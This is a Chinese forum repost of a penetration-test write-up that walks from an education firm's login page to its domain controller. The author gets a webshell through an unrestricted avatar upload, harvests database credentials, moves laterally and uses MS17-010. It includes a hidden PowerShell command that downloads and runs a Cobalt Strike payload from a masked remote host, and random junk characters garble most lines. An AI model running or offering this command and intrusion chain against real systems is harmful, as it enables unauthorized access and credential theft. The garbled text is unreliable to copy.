|
4 t+ h% `" w& x" B 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路" p- B4 s D3 U1 Q
; m. t4 A8 m# U& v }
/ @$ v- t+ z, M* g% J! ]/ ~$ F
% w2 f' K: q* N7 |0 a `
+ s. l. Q% r; A: s& c7 b4 U$ a4 v+ k" S
正文
( i) i9 K) M: L Q* t
/ _# f# O% c" s3 W8 U
! Y9 r0 }3 F! n- w. A " P2 }* R3 X. f) U
/ x4 \) e/ K% i. X" i
8 x# [7 @$ q1 F/ y2 N9 W4 f6 l y! m
目标:www.xxxx.com(一家教育机构)
2 P7 Y3 j# w3 \打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能2 q0 @7 t$ A3 X3 f, B: l
7 G0 Z9 D" Q% P* d; J
9 F% ?6 E' M- m0 }- d
 4 X' t' S: k: Y5 Z" X, P) [. H) W
6 x8 L: H( I. x" i3 ?% i O, `# @' a( i! }, Q8 L
进行了简单的信息搜集
\# e: M' N6 ?, a B
K7 q* f* F* L
7 h, w+ P' A5 P
/ X6 H. C/ F# m+ o
* \% j1 z' s1 B. ^+ v 子域名搜集5 h5 v0 O% l8 O$ p( ?" q* R& w: @2 z
8 N) i' O; ~0 y1 z7 r' G9 m" e
+ e0 S ?+ n0 f( a9 S: \, f
 9 h5 ~/ _' Q5 ]4 q1 N
; x; H- Q) G$ l. {1 ?2 \- Z
* |, L( `2 ~5 P" q* i- r7 ~: Y( T fofa找资产
5 g# k9 ^% k5 a! `4 z
# q: S$ e# l0 ?% e0 a9 p
' t; G3 C4 U* P$ h- s1 K7 _
6 m) \0 J- @! U1 E1 p. ^
, k* q) f/ R K% t
 4 v( t, I' b$ z! k ^+ g
2 \+ F5 n. C) H4 m! g2 O' E ]6 Z
一共七个资产。去重之后只有两个。
5 f5 x: v5 o, ~* S" I' U5 ]
o3 g. a2 o$ N* ^9 {' E$ j5 A; W/ i+ u4 T
2 J' G3 |8 c" N y
* ]) ~- f4 m. X9 D% s5 I3 T 目录探测
$ a# U7 U5 D) |
% x3 C J- Z; F M( H
5 I% Y# X/ Q, C/ C1 i, A. f  : x" `2 f0 p" y6 I" Q: W
- n* J8 F9 C, D- K2 B3 |8 {% w8 {1 h/ E6 |5 X" e" n
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
t+ I |1 A$ l* Q
4 M: M" ~. |# }! a# C
: V d5 o5 L6 w# G0 P4 Z ) ?' [$ ~7 U' Y/ B! N t: ~
4 ^" H& ?, n, S! O6 W
我又尝试了通过修改返回包来绕过登录界面
/ B+ L; C6 N% `% V. g" K
* ~& C% N1 W: S6 A0 l3 r" \% b, e
1 X- h# D! L0 c! |, ^$ m  5 j. B d8 z% P0 E* z
2 F5 l4 r+ \4 _# m+ P( L t/ b
+ P+ j. Y( |% J, n 还是不行,尝试注入无果
+ D/ s) f. a; Q$ [1 _ 6 b. h0 q8 o: K& Q [3 a
1 q+ ~' r! q7 O: y- Z
, G/ D: `* c0 m! \: [/ |
/ s5 s' ^% n: W/ a- u/ |* T$ l/ X0 V' g) s/ |6 I. [
不过我目录探测出了一处Spring信息泄露
4 w' a2 d, L8 w' u7 @( b
! P6 _; }3 b. A/ i3 Q& h i
. o. P. l+ F3 m) T
, _% _5 }9 g8 |0 `+ e7 e1 `
* L+ {" {, y7 h2 R+ F& ]% N/ t 
6 n, R* Q4 t9 o& l
" W y" Z$ `, w0 @ P' Q- w! S" i0 s, ]# N. |4 V3 }
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
9 W6 j+ k) F6 h& V# n7 d* S/ ~+ m
$ y! o- p' w/ A! r" w2 _9 z% M6 }7 u) n2 K4 B; @3 T
 $ U8 H& z. r7 W. l/ E8 ?
4 k) I7 u, Z$ r/ C0 i) ?3 Z
8 _( D5 A( b! G& M 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。. J9 r3 [* D1 B
# G- i+ J& l/ B7 u
4 R: ~( y& f7 I9 i
) p( i3 h: ?$ n9 z& \. P " Q. K" ], c2 V4 k4 ~* L
1 l1 H! i% F: H4 |
获取有些师傅到这一步就手机抓包电脑测了。
+ k8 A' W3 a) j. T3 G0 w5 ~6 V
$ L% a3 D) y' d
9 }$ I D6 ~: s& {5 ~ Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
: S+ |. O, P R, r( |& W 9 T1 g3 E! B+ d& J. u- b
* \9 ^/ o- G/ X; p3 j5 Q
其中在一个公众号发现了小程序,可以进行注册。 w' I- U0 T, D; Z" \
) ^& A2 d! D/ m2 f6 g8 M1 Z* k) F$ G$ |" }& k. F/ o3 g% p
看到了头像上传,尝试上传获取WebShell
, ~+ B% C* Z" W
" {+ w9 `% k5 l. x
3 M7 v0 W4 t2 W+ b# | 
9 p1 }# A" Q* B7 ]; ]% } 9 B" F! V% y9 v" E( W: R' n5 I
. C) I W+ J- X+ d E 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问* @8 J" W6 A7 q9 \) P* k7 j1 n7 H
1 }% R- p- j2 a# \! B+ y8 f4 D2 w8 C
' X; {. [. V0 q% }" [
- c* @! {; v1 B) Z! ]: Z- A1 r1 W- E7 |9 `
然后上了大马+ |1 d% [! i: s- y- Q; b
H( X7 f3 t8 k! S! K, Y+ s- R/ c# R; }0 u; B1 ?& n
9 f8 w" V1 X i
# v/ j: y# t f1 G( E( p) k/ a
2 k5 U s) [- j  - S- a2 R1 O0 y3 T# L; P" i1 U- @' o
" c/ t; b% N" ` D; v; F, W
$ Y- [ x8 `7 y
通过翻找文件发现数据库账号密码0 ^$ G& _1 h" ?$ f! X2 k
; _& z9 E) a1 ?! J7 q
% f) p7 u6 h& Y; @  + g1 f1 Z O0 Z v
3 n8 y" X" g. v/ h O" S6 {$ Z% _
--内网渗透3 l8 V/ N! y+ s* o3 Y- N; ?# Z) {
* C9 u' L0 a4 l' D* h1 M3 V8 y0 a
4 h, S4 Q- g5 S$ R) q9 a$ q0 o5 g" r 直接通过powershell执行 cs上线! \3 [/ q7 n% p& J1 z
Q, v0 k; _& O0 q, w3 a+ k
2 T9 o5 ]* q3 X1 C, E" V
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"9 a+ M% [" b. H& l
0 f- {$ i! O( o
/ c/ o. Q+ L! O" o+ @1 b: [ 
; r4 F& B; y' B; o: r& A7 j
# M2 W- _5 e' l ?% ^) A' Z- w* ~ j c! x, F m/ P
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破. s9 |* x$ k2 r, u
) L, j- H) U7 j! T- _
1 J; f& j7 f& R7 I2 P* P* a 
3 [* ]5 |; N" q1 C" _& ?) N3 i) b
6 z2 Y/ C; Q# E; W" @2 [% y
& T7 y6 o: S% }+ G2 j9 a 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
0 C$ C ^% D! b
7 L* {3 y" m7 z8 H, n% v4 q2 W
% r' a8 Y M: G) F5 B1 t% N$ y/ y9 q- \) G9 _ ]
7 b; `7 {6 w4 H6 U
D8 H r: X5 p& C: X3 v( z* j
7 u6 I! G/ y4 J! v9 y" A
1 f& \4 {7 M! L1 w" W/ x B5 g& |8 ~+ S6 l7 I/ g: y, H' n A
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
; E+ D6 Y, }+ c, N* B- ^
2 h1 n9 P; O9 M; A9 }( q! s" j$ I' p- J* ^3 i
0 K; R* H m6 ?& D" E7 u" B
# I1 n; B' p) x: n" R2 s' o  9 J# ~: M# [! `( h
. \+ r- o! ]: w) u( W0 s- {
; i# a, A0 |% f4 W
! b9 g( ]$ b. F* J
- Q/ v- r0 I/ X* f' X* H! }9 O
& @& j' X9 x; F Z ; M$ T) P/ d h
( g3 H* u5 f+ U, Z4 ], |
4 H% ~' L0 |6 m# i/ q 4 m6 _# r3 D& n9 n; w
- L) ?- o- P ] ?) ], S 小结& e: N6 l4 g8 J( ~* }' r
* N" k7 |. ^) X2 i; X- B: L% _; b
! q* i0 A s2 X, o; `
4 v: i% j9 p5 R* o
5 ^5 g" p8 W, g, [* E" y+ D. c) K% o- j/ n
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!. F+ M# J' A) ~8 h( l! J& K6 E; V1 q
$ Y/ {5 m' h: n1 K
! Z" o8 }, {& L% [! O4 D
/ Z; I! y# e( I, A6 \! v5 Z) Z; d
5 k) y3 e6 P$ n# l3 f. ~" d# B2 i L+ M
-
( X/ U6 S Y2 G / {/ M8 p: @- |+ @
3 V, `4 L y3 z% \ L3 s4 K6 f
-
+ y5 [* Z+ p: a$ ]* [# s$ [
% W! V' I1 K; C
1 P3 M$ `8 ?4 y7 p$ n
) m5 c8 b, Y- Q0 b9 G, s8 R$ z, D! R' ]% ~8 E) L/ W# K$ H6 V) [* A' o
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
8 ^6 ^' X* q4 y1 t
; r. ?7 I |0 m0 U* `- i- g o0 r5 Y+ X
0 s5 l& h5 g' q3 _9 p# j7 ~5 n | 
发表于 2024-3-1 19:41:32
收藏
支持
反对